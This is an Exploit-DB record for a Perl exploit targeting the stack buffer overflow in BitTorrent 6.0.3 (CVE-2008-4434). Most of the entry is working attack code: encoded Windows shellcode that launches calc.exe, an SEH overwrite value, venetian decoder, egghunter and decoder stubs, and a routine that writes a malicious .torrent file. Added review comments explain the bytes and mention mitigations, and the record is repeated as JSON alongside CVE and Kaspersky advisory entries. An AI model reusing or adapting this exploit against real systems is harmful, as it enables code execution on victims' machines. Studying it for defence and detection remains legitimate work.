ID EDB-ID:6787 Type exploitdb Reporter Guido Landi Modified 2008-10-19T00:00:00
Description
BitTorrent 6.0.3 .torrent file stack buffer overflow exploit (CVE-2008-4434). Local exploit for the Windows platform.
#!/usr/bin/perl
# BitTorrent 6.0.3 .torrent File Stack Buffer Overflow Exploit
# 09/21/2008 by k`sOSe && oVeret
use warnings;
use strict;
# Payload that the script stores in the torrent's "comment" field (see the print
# statement at the end of the script). According to the generator banner below it is
# a windows/exec payload that launches C:\WINDOWS\system32\calc.exe, i.e. a
# proof-of-concept command, encoded with x86/alpha_mixed (337 bytes).
# Author's note: if you change this (avoid \x80->\x9f unless you really know what you
# are doing) you must also change the length value of the decoder.
my $shellcode =
# windows/exec CMD="C:\WINDOWS\system32\calc.exe"
#[*] x86/alpha_mixed succeeded, final size 337
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41" .
"\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41" .
"\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x4b\x58\x51" .
"\x54\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47\x4c\x4c" .
"\x4b\x43\x4c\x45\x55\x44\x38\x43\x31\x4a\x4f\x4c\x4b\x50" .
"\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a\x4b\x51" .
"\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46\x51\x49" .
"\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x42\x54\x43\x37\x49" .
"\x51\x48\x4a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c\x34\x47" .
"\x4b\x50\x54\x47\x54\x43\x34\x43\x45\x4d\x35\x4c\x4b\x51" .
"\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50" .
"\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c\x4b\x45" .
"\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x46\x44\x45" .
"\x54\x48\x43\x51\x4f\x46\x51\x4b\x46\x45\x30\x46\x36\x45" .
"\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44\x4c\x4c" .
"\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x45\x58\x4d" .
"\x59\x4b\x48\x4d\x53\x49\x50\x42\x4a\x50\x50\x45\x38\x4a" .
"\x50\x4c\x4a\x43\x34\x51\x4f\x45\x38\x4c\x58\x4b\x4e\x4c" .
"\x4a\x44\x4e\x50\x57\x4b\x4f\x4a\x47\x50\x43\x46\x5a\x51" .
"\x4c\x46\x37\x50\x49\x50\x4e\x51\x54\x50\x4f\x50\x57\x50" .
"\x53\x51\x4c\x42\x53\x43\x49\x44\x33\x44\x34\x45\x35\x42" .
"\x4d\x50\x33\x46\x52\x51\x4c\x42\x43\x43\x51\x42\x4c\x45" .
"\x33\x46\x4e\x43\x55\x42\x58\x42\x45\x43\x30\x44\x4a\x41" .
"\x41";
# Two marker bytes appended after the payload. The author's note says they end up in
# memory as \x21\x20\x21\x20, the "egg" value that the egghunter listing compares against.
# NOTE(review): 0x87 maps to U+2021 in Windows-1252, which would explain the
# "english windows version" remark (the marker depends on the ANSI code page) - confirm.
$shellcode .= "\x87\x87"; # -> \x21\x20\x21\x20 -> EGG ( for english windows version )
# Two-byte value that is repeated 192 times at the start of the overflow buffer.
# NOTE(review): a pop/pop/ret address is the usual sign of an overwritten SEH handler;
# if that is the case here, SafeSEH/SEHOP are the relevant mitigations. Not confirmable
# from this script alone.
my $ret = "\x3f\x41"; # -> unicode friendly pop,pop,ret
# unicode friendly get_EIP (needed by the venetian decoder)
sub get_eip
{
# Returns a fixed 41-byte string (12 + 2*12 + 2 + 3 bytes) that is placed in the
# overflow buffer right after the repeated $ret value. Takes no arguments.
# The listing below is the author's disassembly of those bytes as they look once every
# input byte is followed by a 00 byte ("unicode friendly"); that widening is why
# ADD BYTE PTR instructions (00 41 00 / 00 42 00) sit between the intended instructions.
# NOTE(review): the listing is the author's and is not verified here against a disassembler.
#0041 00 ADD BYTE PTR DS:[ECX],AL
#5F POP EDI
#0041 00 ADD BYTE PTR DS:[ECX],AL
#5F POP EDI
#0041 00 ADD BYTE PTR DS:[ECX],AL
#6A 00 PUSH 0
#58 POP EAX
#0041 00 ADD BYTE PTR DS:[ECX],AL
#57 PUSH EDI
#0041 00 ADD BYTE PTR DS:[ECX],AL
#54 PUSH ESP
#0041 00 ADD BYTE PTR DS:[ECX],AL
#5A POP EDX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#43 INC EBX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#58 POP EAX
#0041 00 ADD BYTE PTR DS:[ECX],AL
# The string is the sub's implicit return value; "x" binds tighter than ".", so only the
# two-byte "\x42\x40" piece is repeated 12 times (matching the 12 INC EAX lines above).
"\x5f\x41\x5f\x41\x6a\x58\x41\x57\x41\x54\x41\x5a" . "\x42\x40" x 12 . "\x42\x43" . "\x42\x58\x41";
}
sub egghunter
{
# Returns the 21-byte egg-hunter stub in plain (not venetian-encoded) form. Takes no arguments.
# Nothing in the visible script calls this sub; it reads as a reference copy of the stage
# that venetian_decoder() is said to carry in encoded form.
# Per the author's listing, the stub scans memory upward from 0x00720000 for the dword
# 0x20212021, i.e. the marker produced by the two \x87 bytes appended to $shellcode.
#6A01 PUSH 1
#5E POP ESI
#4E DEC ESI (=0)
#6A72 PUSH 72 <- starts from 0x00720000
#56 PUSH ESI
#4C DEC ESP
#4C DEC ESP
#5E POP ESI
#5E POP ESI <- ESI == 0x00720000
#BA21202120 /MOV EDX,20212021 <- egg
#46 |INC ESI
#3B16 |CMP EDX,DWORD PTR DS:[ESI]
#75FB \JNZ SHORT egghunter
# Implicit return value of the sub.
"\x6A\x01\x5E\x4E\x6A\x72\x56\x4C\x4C\x5E\x5E\xBA\x21\x20\x21\x20\x46\x3B\x16\x75\xFB";
}
# This decodes the Unicode-expanded shellcode by pushing it onto the stack and then executes it
sub decoder
{
# Returns the 33-byte decoder stub in plain (not venetian-encoded) form. Takes no arguments.
# Nothing in the visible script calls this sub; it reads as a reference copy of the stage
# that venetian_decoder() is said to carry in encoded form.
# Per the author's description and listing, the stub copies the widened payload onto the
# stack in a loop and then returns into that copy. Because the final stage runs from the
# stack, a non-executable stack (DEP/NX) on the victim process stops the chain at this point.
#46 INC ESI
#6A01 PUSH 1
#6801010155 PUSH 0x55010101
#4C DEC ESP
#5B POP EBX
#5B POP EBX
#AD /LODS DWORD PTR DS:[ESI]
#50 |PUSH EAX
#44 |INC ESP
#44 |INC ESP
#44 |INC ESP
#4E |DEC ESI
#4E |DEC ESI
#4E |DEC ESI
#4E |DEC ESI
#4E |DEC ESI
#4E |DEC ESI
#4B |DEC EBX
#83FB01 |CMP EBX,1
#75EF \JNE SHORT decoder
#54 PUSH ESP
#59 POP ECX
#4C DEC ESP -> realign
#51 PUSH ECX
#C3 RET
# Implicit return value of the sub.
"\x46\x6A\x01\x68\x01\x01\x01\x55\x4C\x5B\x5B\xAD\x50\x44\x44\x44\x4E\x4E\x4E\x4E\x4E\x4E\x4B\x83\xFB\x01\x75\xEF\x54\x59\x4c\x51\xc3";
}
# venetian decoder + venetian-encoded egghunter and decoder
sub venetian_decoder
{
# Returns one fixed byte string that forms the last part of the overflow buffer (it is
# appended after get_eip() where $stack_buffer is built). Takes no arguments.
# According to the author's comment it holds the venetian decoder together with the
# venetian-encoded egghunter and decoder stages.
# NOTE(review): the page gives no disassembly for these bytes, so the roles of the
# individual runs (e.g. the long \x04 run) are not documented here - treat the blob as opaque.
"\x05\x03\x01\x71\x2D\x01\x01\x71\x40\x71\xC6\x01\x71\x40\x71\x40".
"\x71\xC6\x4E\x71\x40\x71\x40\x71\xC6\x72\x71\x40\x71\x40\x71\xC6".
"\x4C\x71\x40\x71\x40\x71\xC6\x5E\x71\x40\x71\x40\x71\xC6\xBA\x71".
"\x40\x71\x40\x71\xC6\x20\x71\x40\x71\x40\x71\xC6\x20\x71\x40\x71".
"\x40\x71\xC6\x3B\x71\x40\x71\x40\x71\xC6\x75\x71\x40\x71\x40\x71".
"\xC6\x46\x71\x40\x71\x40\x71\xC6\x01\x71\x40\x71\x40\x71\xC6\x01".
"\x71\x40\x71\x40\x71\xC6\x01\x71\x40\x71\x40\x71\xC6\x4C\x71\x40".
"\x71\x40\x71\xC6\x5B\x71\x40\x71\x40\x71\xC6\x50\x71\x40\x71\x40".
"\x71\xC6\x44\x71\x40\x71\x40\x71\xC6\x4E\x71\x40\x71\x40\x71\xC6".
"\x4E\x71\x40\x71\x40\x71\xC6\x4E\x71\x40\x71\x40\x71\xC6\x4B\x71".
"\x40\x71\xFE\xFE\x40\x71\xC6\xFB\x71\x40\x71\x40\x71\xC6\x75\x71".
"\x40\x71\x40\x71\xC6\x54\x71\x40\x71\x40\x71\xC6\x4C\x71\x40\x71".
"\x40\x71\xC6\xC3\x71\x40\x71\x04\x04\x04\x04\x04\x04\x04\x04\x04".
"\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04".
"\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04".
"\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04".
"\x6A\x5E\x6A\x56\x4C\x5E\x21\x21\x46\x16\xFB\x6A\x68\x01\x55\x5B".
"\xAD\x44\x44\x4E\x4E\x4E\x81\x01\xEF\x59\x51";
}
# Overflow buffer: 192 copies of the 2-byte $ret value (384 bytes), then the get_eip()
# stub, then the venetian_decoder() blob. egghunter() and decoder() are not called here.
my $stack_buffer = $ret x 192 . get_eip() . venetian_decoder();
# The result is written to torrent.torrent in the current working directory.
# NOTE(review): bareword handle with 2-arg open; the return values of print and close
# are not checked, so a short or failed write goes unnoticed.
open(HANDLE, "> torrent.torrent") || die "Error!\n\n";
# The file is a single bencoded dictionary. Every string is emitted as <length>:<bytes>,
# and the length() calls keep those prefixes consistent with the injected values:
#   announce      -> http://qwerty.qwe
#   comment       -> $shellcode (payload plus the two marker bytes)
#   created by    -> $stack_buffer (the oversized value)
#   creation date -> 1218555046, encoding -> iso-8859-1
#   info          -> length 1, name bu.txt, piece length 65536, pieces (20 bytes)
# The final literal is the 20-byte pieces value followed by \x65\x65 ("ee", closing the
# info and outer dictionaries) and a newline.
# CVE-2008-4434 attributes the stack overflow to a long "Created By" field in a .torrent file.
# Defensive takeaway: a "created by" value is normally a short client name/version string,
# so a parser or gateway can reject .torrent files whose "created by" length is far beyond
# that; the fixed strings above identify unmodified copies of this proof of concept.
print HANDLE "d8:announce17:http://qwerty.qwe7:comment" .
length($shellcode) .":" .
$shellcode .
"10:created by" .
length($stack_buffer) . ":" .
$stack_buffer .
"13:creation datei1218555046e8:encoding10:iso-8859-14:infod6:lengthi1e4:name6:bu.txt12:piece lengthi65536e6:pieces20:".
"\x86\xf7\xe4\x37\xfa\xa5\xa7\xfc\xe1\x5d\x1d\xdc\xb9\xea\xea\xea\x37\x76\x67\xb8\x65\x65\x0a";
close (HANDLE);
# milw0rm.com [2008-10-19]
{"bulletinFamily": "exploit", "id": "EDB-ID:6787", "cvelist": ["CVE-2008-4434"], "modified": "2008-10-19T00:00:00", "lastseen": "2016-02-01T00:39:29", "edition": 1, "sourceData": "#!/usr/bin/perl\n# BitTorrent 6.0.3 .torrent File Stack Buffer Overflow Exploit\n# 09/21/2008 by k`sOSe && oVeret\n\nuse warnings;\nuse strict;\n\n# If you change this(avoid \\x80->\\x9f unless you really know what you are doing) you must also change the length value of the decoder\nmy $shellcode = \n# windows/exec CMD=\"C:\\WINDOWS\\system32\\calc.exe\" \n#[*] x86/alpha_mixed succeeded, final size 337 \n\"\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\" .\n\"\\x49\\x49\\x49\\x37\\x51\\x5a\\x6a\\x41\\x58\\x50\\x30\\x41\\x30\\x41\" .\n\"\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30\\x42\\x42\\x41\" .\n\"\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x4b\\x4c\\x4b\\x58\\x51\" .\n\"\\x54\\x43\\x30\\x45\\x50\\x45\\x50\\x4c\\x4b\\x51\\x55\\x47\\x4c\\x4c\" .\n\"\\x4b\\x43\\x4c\\x45\\x55\\x44\\x38\\x43\\x31\\x4a\\x4f\\x4c\\x4b\\x50\" .\n\"\\x4f\\x42\\x38\\x4c\\x4b\\x51\\x4f\\x47\\x50\\x43\\x31\\x4a\\x4b\\x51\" .\n\"\\x59\\x4c\\x4b\\x50\\x34\\x4c\\x4b\\x43\\x31\\x4a\\x4e\\x46\\x51\\x49\" .\n\"\\x50\\x4a\\x39\\x4e\\x4c\\x4b\\x34\\x49\\x50\\x42\\x54\\x43\\x37\\x49\" .\n\"\\x51\\x48\\x4a\\x44\\x4d\\x45\\x51\\x48\\x42\\x4a\\x4b\\x4c\\x34\\x47\" .\n\"\\x4b\\x50\\x54\\x47\\x54\\x43\\x34\\x43\\x45\\x4d\\x35\\x4c\\x4b\\x51\" .\n\"\\x4f\\x51\\x34\\x45\\x51\\x4a\\x4b\\x42\\x46\\x4c\\x4b\\x44\\x4c\\x50\" .\n\"\\x4b\\x4c\\x4b\\x51\\x4f\\x45\\x4c\\x43\\x31\\x4a\\x4b\\x4c\\x4b\\x45\" .\n\"\\x4c\\x4c\\x4b\\x45\\x51\\x4a\\x4b\\x4d\\x59\\x51\\x4c\\x46\\x44\\x45\" .\n\"\\x54\\x48\\x43\\x51\\x4f\\x46\\x51\\x4b\\x46\\x45\\x30\\x46\\x36\\x45\" .\n\"\\x34\\x4c\\x4b\\x47\\x36\\x50\\x30\\x4c\\x4b\\x51\\x50\\x44\\x4c\\x4c\" .\n\"\\x4b\\x44\\x30\\x45\\x4c\\x4e\\x4d\\x4c\\x4b\\x45\\x38\\x45\\x58\\x4d\" .\n\"\\x59\\x4b\\x48\\x4d\\x53\\x49\\x50\\x42\\x4a\\x50\\x50\\x45\\x38\\x4a\" 
.\n\"\\x50\\x4c\\x4a\\x43\\x34\\x51\\x4f\\x45\\x38\\x4c\\x58\\x4b\\x4e\\x4c\" .\n\"\\x4a\\x44\\x4e\\x50\\x57\\x4b\\x4f\\x4a\\x47\\x50\\x43\\x46\\x5a\\x51\" .\n\"\\x4c\\x46\\x37\\x50\\x49\\x50\\x4e\\x51\\x54\\x50\\x4f\\x50\\x57\\x50\" .\n\"\\x53\\x51\\x4c\\x42\\x53\\x43\\x49\\x44\\x33\\x44\\x34\\x45\\x35\\x42\" .\n\"\\x4d\\x50\\x33\\x46\\x52\\x51\\x4c\\x42\\x43\\x43\\x51\\x42\\x4c\\x45\" .\n\"\\x33\\x46\\x4e\\x43\\x55\\x42\\x58\\x42\\x45\\x43\\x30\\x44\\x4a\\x41\" .\n\"\\x41\";\n\n$shellcode .= \"\\x87\\x87\"; # -> \\x21\\x20\\x21\\x20 -> EGG ( for english windows version )\n\nmy $ret\t= \"\\x3f\\x41\"; # -> unicode friendly pop,pop,ret\n\n# unicode friendly get_EIP (needed by the venetian decoder)\nsub get_eip\n{\n\t#0041 00 ADD BYTE PTR DS:[ECX],AL\n\t#5F POP EDI\n\t#0041 00 ADD BYTE PTR DS:[ECX],AL\n\t#5F POP EDI\n\t#0041 00 ADD BYTE PTR DS:[ECX],AL\n\t#6A 00 PUSH 0\n\t#58 POP EAX\n\t#0041 00 ADD BYTE PTR DS:[ECX],AL\n\t#57 PUSH EDI\n\t#0041 00 ADD BYTE PTR DS:[ECX],AL\n\t#54 PUSH ESP\n\t#0041 00 ADD BYTE PTR DS:[ECX],AL\n\t#5A POP EDX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#40 INC EAX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#40 INC EAX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#40 INC EAX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#40 INC EAX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#40 INC EAX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#40 INC EAX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#40 INC EAX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#40 INC EAX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#40 INC EAX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#40 INC EAX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#40 INC EAX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#40 INC EAX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#43 INC EBX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#58 POP EAX\n\t#0041 00 ADD BYTE PTR DS:[ECX],AL\n\t\"\\x5f\\x41\\x5f\\x41\\x6a\\x58\\x41\\x57\\x41\\x54\\x41\\x5a\" . \"\\x42\\x40\" x 12 . \"\\x42\\x43\" . 
\"\\x42\\x58\\x41\";\n}\n\n\nsub egghunter\n{\n\t#6A01\t\tPUSH 1\n\t#5E\t\tPOP ESI\n\t#4E\t\tDEC ESI (=0)\n\t#6A72\t\tPUSH 72\t\t\t\t<- starts from 0x00720000\n\t#56\t\tPUSH ESI\n\t#4C\t\tDEC ESP\n\t#4C\t\tDEC ESP\n\t#5E\t\tPOP ESI\n\t#5E\t\tPOP ESI\t\t\t\t<- ESI == 0x00720000\n\t#BA21202120\t/MOV EDX,20212021\t\t<- egg\n\t#46\t\t|INC ESI\n\t#3B16\t\t|CMP EDX,DWORD PTR DS:[ESI]\n\t#75FB\t\t\\JNZ SHORT egghunter\n\t\"\\x6A\\x01\\x5E\\x4E\\x6A\\x72\\x56\\x4C\\x4C\\x5E\\x5E\\xBA\\x21\\x20\\x21\\x20\\x46\\x3B\\x16\\x75\\xFB\";\n}\n\n# this will decode the unicode expanded shellcode pushing it to the stack and the execute it\nsub decoder\n{\n\t#46\t\tINC ESI\n\t#6A01\t\tPUSH 1\n\t#6801010155\tPUSH 0x55010101\n\t#4C\t\tDEC ESP\n\t#5B\t\tPOP EBX\n\t#5B\t\tPOP EBX\n\t#AD\t\t/LODS DWORD PTR DS:[ESI]\n\t#50\t\t|PUSH EAX\n\t#44\t\t|INC ESP\n\t#44\t\t|INC ESP\n\t#44\t\t|INC ESP\n\t#4E\t\t|DEC ESI\n\t#4E\t\t|DEC ESI\n\t#4E\t\t|DEC ESI\n\t#4E\t\t|DEC ESI\n\t#4E\t\t|DEC ESI\n\t#4E\t\t|DEC ESI\n\t#4B\t\t|DEC EBX\n\t#83FB01\t\t|CMP EBX,1\n\t#75EF\t\t\\JNE SHORT decoder\n\t#54\t\tPUSH ESP\n\t#59\t\tPOP ECX\n\t#4C\t\tDEC ESP\t\t-> realign\n\t#51\t\tPUSH ECX\n\t#C3\t\tRET\n\"\\x46\\x6A\\x01\\x68\\x01\\x01\\x01\\x55\\x4C\\x5B\\x5B\\xAD\\x50\\x44\\x44\\x44\\x4E\\x4E\\x4E\\x4E\\x4E\\x4E\\x4B\\x83\\xFB\\x01\\x75\\xEF\\x54\\x59\\x4c\\x51\\xc3\";\n}\n\n# venetian deccoder + venetian encoded egghunter and decoder\nsub 
venetian_decoder\n{\n\"\\x05\\x03\\x01\\x71\\x2D\\x01\\x01\\x71\\x40\\x71\\xC6\\x01\\x71\\x40\\x71\\x40\".\n\"\\x71\\xC6\\x4E\\x71\\x40\\x71\\x40\\x71\\xC6\\x72\\x71\\x40\\x71\\x40\\x71\\xC6\".\n\"\\x4C\\x71\\x40\\x71\\x40\\x71\\xC6\\x5E\\x71\\x40\\x71\\x40\\x71\\xC6\\xBA\\x71\".\n\"\\x40\\x71\\x40\\x71\\xC6\\x20\\x71\\x40\\x71\\x40\\x71\\xC6\\x20\\x71\\x40\\x71\".\n\"\\x40\\x71\\xC6\\x3B\\x71\\x40\\x71\\x40\\x71\\xC6\\x75\\x71\\x40\\x71\\x40\\x71\".\n\"\\xC6\\x46\\x71\\x40\\x71\\x40\\x71\\xC6\\x01\\x71\\x40\\x71\\x40\\x71\\xC6\\x01\".\n\"\\x71\\x40\\x71\\x40\\x71\\xC6\\x01\\x71\\x40\\x71\\x40\\x71\\xC6\\x4C\\x71\\x40\".\n\"\\x71\\x40\\x71\\xC6\\x5B\\x71\\x40\\x71\\x40\\x71\\xC6\\x50\\x71\\x40\\x71\\x40\".\n\"\\x71\\xC6\\x44\\x71\\x40\\x71\\x40\\x71\\xC6\\x4E\\x71\\x40\\x71\\x40\\x71\\xC6\".\n\"\\x4E\\x71\\x40\\x71\\x40\\x71\\xC6\\x4E\\x71\\x40\\x71\\x40\\x71\\xC6\\x4B\\x71\".\n\"\\x40\\x71\\xFE\\xFE\\x40\\x71\\xC6\\xFB\\x71\\x40\\x71\\x40\\x71\\xC6\\x75\\x71\".\n\"\\x40\\x71\\x40\\x71\\xC6\\x54\\x71\\x40\\x71\\x40\\x71\\xC6\\x4C\\x71\\x40\\x71\".\n\"\\x40\\x71\\xC6\\xC3\\x71\\x40\\x71\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\".\n\"\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\".\n\"\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\".\n\"\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\".\n\"\\x6A\\x5E\\x6A\\x56\\x4C\\x5E\\x21\\x21\\x46\\x16\\xFB\\x6A\\x68\\x01\\x55\\x5B\".\n\"\\xAD\\x44\\x44\\x4E\\x4E\\x4E\\x81\\x01\\xEF\\x59\\x51\";\n}\n\nmy $stack_buffer\t= $ret x 192 . get_eip() . venetian_decoder();\n\nopen(HANDLE, \"> torrent.torrent\") || die \"Error!\\n\\n\";\nprint HANDLE\t\"d8:announce17:http://qwerty.qwe7:comment\" \t. \n\t\tlength($shellcode) .\":\" \t\t\t. \n\t\t$shellcode .\n\t\t\"10:created by\" \t\t\t\t.\n\t\tlength($stack_buffer) . 
\":\"\t\t\t.\n\t\t$stack_buffer\t\t\t\t\t.\n\t\t\"13:creation datei1218555046e8:encoding10:iso-8859-14:infod6:lengthi1e4:name6:bu.txt12:piece lengthi65536e6:pieces20:\".\t\n\t\t\"\\x86\\xf7\\xe4\\x37\\xfa\\xa5\\xa7\\xfc\\xe1\\x5d\\x1d\\xdc\\xb9\\xea\\xea\\xea\\x37\\x76\\x67\\xb8\\x65\\x65\\x0a\";\nclose (HANDLE);\n\n# milw0rm.com [2008-10-19]\n", "published": "2008-10-19T00:00:00", "href": "https://www.exploit-db.com/exploits/6787/", "osvdbidlist": ["47585"], "reporter": "Guido Landi", "hash": "39a185444e8c2313e3cdd197d5b9e73f55fec08bd153df5e10c3fb7fc0b6bfce", "title": "BitTorrent 6.0.3 - .torrent Stack Buffer Overflow Exploit", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "BitTorrent 6.0.3 .torrent File Stack Buffer Overflow Exploit. CVE-2008-4434. Local exploit for windows platform", "references": [], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/6787/", "viewCount": 2, "enchantments": {"vulnersScore": 4.9}}
{"result": {"cve": [{"id": "CVE-2008-4434", "type": "cve", "title": "CVE-2008-4434", "description": "Stack-based buffer overflow in (1) uTorrent 1.7.7 build 8179 and earlier and (2) BitTorrent 6.0.3 build 8642 and earlier allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long Created By field in a .torrent file.", "published": "2008-10-03T18:22:45", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4434", "cvelist": ["CVE-2008-4434"], "lastseen": "2017-08-08T11:24:56"}], "kaspersky": [{"id": "KLA10089", "type": "kaspersky", "title": "\r KLA10089DoS vulnerability in Torrent\t\t\t ", "description": "### *CVSS*:\n9.3\n\n### *Detect date*:\n10/03/2008\n\n### *Severity*:\nCritical\n\n### *Description*:\nA buffer overflow was found in the BitTorrent & UTorrent. By exploiting this vulnerability malicious users can cause denial of service and possibly execute arbitrary code. This vulnerability can be exploited remotely via a specially designed .torrent file.\n\n### *Affected products*:\nBitTorrent versions 6.0.3 build 8642 and earlier \nUTorrent versions 1.7.7 build 8179 and earlier\n\n### *Solution*:\nUpdate to latest version\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[uTorrent](<https://threats.kaspersky.com/en/product/uTorrent/>)\n\n### *CVE-IDS*:\n[CVE-2008-4434](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4434>)", "published": "2008-10-03T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threats.kaspersky.com/en/vulnerability/KLA10089", "cvelist": ["CVE-2008-4434"], "lastseen": "2018-03-30T14:11:14"}]}}